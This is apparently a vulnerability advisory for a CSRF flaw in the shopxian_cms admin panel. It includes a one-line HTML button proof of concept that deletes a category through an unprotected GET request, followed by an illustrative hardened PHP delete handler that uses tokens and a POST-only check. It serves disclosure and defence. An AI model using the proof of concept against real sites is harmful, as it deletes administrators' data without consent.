Cross-site request forgery exists in shopxian_cms
vendor:https://github.com/zhangqiquan/shopxian_cms
download link:https://github.com/zhangqiquan/shopxian_cms.git
Vulnerability details: while the administrator is logged in, clicking the button (see the POC below) deletes the specified column (category), because the delete request carries no CSRF protection.
Vulnerability POC:
<input type="button" onclick="location.href='http://127.0.0.1/index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17'" value="Click Me!!!">
CSRF HTML:
Save the POC above as an HTML file, open it in the browser where the administrator is logged in, and click the button.
Result: successfully deleted (the column with id=17 is gone).
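The root cause is a state-changing action reachable by a plain GET whose only credential is the admin's session cookie, which the browser attaches to a cross-site request automatically. The PHP below is an added example of the hardened shape of such a delete handler; it is not shopxian_cms code and uses no shopxian_cms API. The route, field names, the ALLOWED_ORIGIN constant and the delete_category() call are assumptions made for illustration.

```php
<?php
// Added example (not shopxian_cms code): a delete-category handler hardened
// against the CSRF described above. Assumes a PHP session and a synchronizer
// token; every route, field and function name here is hypothetical.
declare(strict_types=1);

session_start();

const TOKEN_FIELD    = '_csrf_token';            // hypothetical form field name
const ALLOWED_ORIGIN = 'https://shop.example';   // hypothetical site origin

/** Issue, once per session, the secret token that admin forms must echo back. */
function csrf_token(): string
{
    if (empty($_SESSION[TOKEN_FIELD])) {
        $_SESSION[TOKEN_FIELD] = bin2hex(random_bytes(32));
    }
    return $_SESSION[TOKEN_FIELD];
}

/** Compare the submitted token with the session token in constant time. */
function csrf_check(?string $submitted): bool
{
    $expected = $_SESSION[TOKEN_FIELD] ?? '';
    return $expected !== '' && is_string($submitted)
        && hash_equals($expected, $submitted);
}

/**
 * Render the admin-side form. The token lives in a page only the logged-in
 * admin can read, so an attacker's cross-origin HTML cannot reproduce it.
 */
function render_delete_form(int $catId): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return "<form method=\"post\" action=\"/admin/category/delete\">\n"
         . "  <input type=\"hidden\" name=\"id\" value=\"{$catId}\">\n"
         . "  <input type=\"hidden\" name=\"" . TOKEN_FIELD . "\" value=\"{$token}\">\n"
         . "  <button type=\"submit\">Delete category</button>\n"
         . "</form>\n";
}

/**
 * Hardened handler. Returns the HTTP status it would answer with:
 * 405 for anything but POST, 403 on a missing/invalid token or foreign
 * Origin, 400 on a bad id, 200 when the delete would proceed.
 */
function handle_delete(array $server, array $post): int
{
    // 1. No side effects on GET: a link, image or redirect (the advisory's
    //    button is just location.href) can only ever issue a GET.
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return 405;
    }
    // 2. The synchronizer token must match the one bound to this session.
    if (!csrf_check($post[TOKEN_FIELD] ?? null)) {
        return 403;
    }
    // 3. Defence in depth: if the browser sent an Origin header, it must be ours.
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== ALLOWED_ORIGIN) {
        return 403;
    }
    // 4. Only then touch the input that selects what to delete.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 400;
    }
    // delete_category($id);  // hypothetical model call, omitted in this example
    return 200;
}

// CLI demo: the forged GET from the POC is refused (405), a POST without the
// token is refused (403), and only the tokened POST from the real form passes.
if (PHP_SAPI === 'cli') {
    echo handle_delete(['REQUEST_METHOD' => 'GET'],  ['id' => '17']), "\n";
    echo handle_delete(['REQUEST_METHOD' => 'POST'], ['id' => '17']), "\n";
    echo handle_delete(['REQUEST_METHOD' => 'POST'],
                       ['id' => '17', TOKEN_FIELD => csrf_token()]), "\n";
}
```

Run it with `php handler.php` to see the three verdicts. Restricting the delete to POST alone is not enough, since a cross-site page can auto-submit a form; the per-session token is what a forged request cannot supply. Setting the admin session cookie with the SameSite attribute (Lax or Strict) adds a second, browser-enforced layer on top of the token check.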